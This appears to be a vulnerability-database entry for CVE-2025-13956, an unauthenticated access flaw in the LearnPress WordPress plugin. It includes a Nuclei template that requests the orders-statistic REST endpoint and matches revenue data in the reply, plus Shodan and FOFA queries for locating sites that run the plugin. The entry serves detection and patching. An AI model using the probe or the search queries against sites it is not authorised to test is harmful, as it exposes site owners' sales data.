
LearnPress < 4.3.2 - Broken Access Control

CVE-2025-13956
Verified

Description

The LearnPress – WordPress LMS Plugin for WordPress is vulnerable to unauthorized data access because the statistic function lacks a capability check in all versions up to and including 4.3.1. An unauthenticated attacker can therefore view the plugin's order statistics, including total revenue summaries and order status counts.

Severity

Medium

CVSS Score

5.3

Exploit Probability

3%

Affected Product

learnpress

Published Date

February 7, 2026

Template Author

pussycat0x

CVE-2025-13956.yaml
id: CVE-2025-13956

info:
  name: LearnPress < 4.3.2 - Broken Access Control
  author: pussycat0x
  severity: medium
  description: |
    The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the statistic function in all versions up to, and including, 4.3.1. This makes it possible for unauthenticated attackers to view the plugin's orders statistics, including total revenue summaries and order status counts.
  impact: |
    Unauthenticated attackers can view sensitive order statistics including revenue and order status, leading to information disclosure.
  remediation: |
    Update to a version later than 4.3.1 or the latest available version.
  reference:
    - https://wpscan.com/vulnerability/b4c0e309-45d1-4b00-875d-ec8a76910253/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-13956
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2025-13956
    epss-score: 0.02788
    epss-percentile: 0.8626
    cwe-id: CWE-862
  metadata:
    verified: true
    max-request: 1
    vendor: thimpress
    product: learnpress
    framework: wordpress
    publicwww-query: "/wp-content/plugins/learnpress/"
    fofa-query: body="/wp-content/plugins/learnpress/"
    shodan-query: http.html:"/wp-content/plugins/learnpress/"
  tags: cve,cve2025,wordpress,wp-plugin,wp,learnpress,exposure

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-json/lp/v1/orders/statistic"

    matchers:
      - type: dsl
        dsl:
          - 'contains_any(body, "total-raised", "order-completed", "order-pending", "order-cancelled", "Total Raised")'
          - 'contains(body, "status\":\"success")'
          - 'contains(header, "application/json")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022100fa92e0221be64110986d566cbe378ead4788cb97505b9a929cb0daa82b9c477e02203ad95a5233b40fe6727be7314c2b8dfde57117e795fed55893497b5d354dc6b0:922c64590222798bb761d5b6d8e72950

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
CVE ID:
CVE-2025-13956
CWE ID:
CWE-862

References

https://wpscan.com/vulnerability/b4c0e309-45d1-4b00-875d-ec8a76910253/
https://nvd.nist.gov/vuln/detail/CVE-2025-13956

Remediation Steps

Update to a version later than 4.3.1 or the latest available version.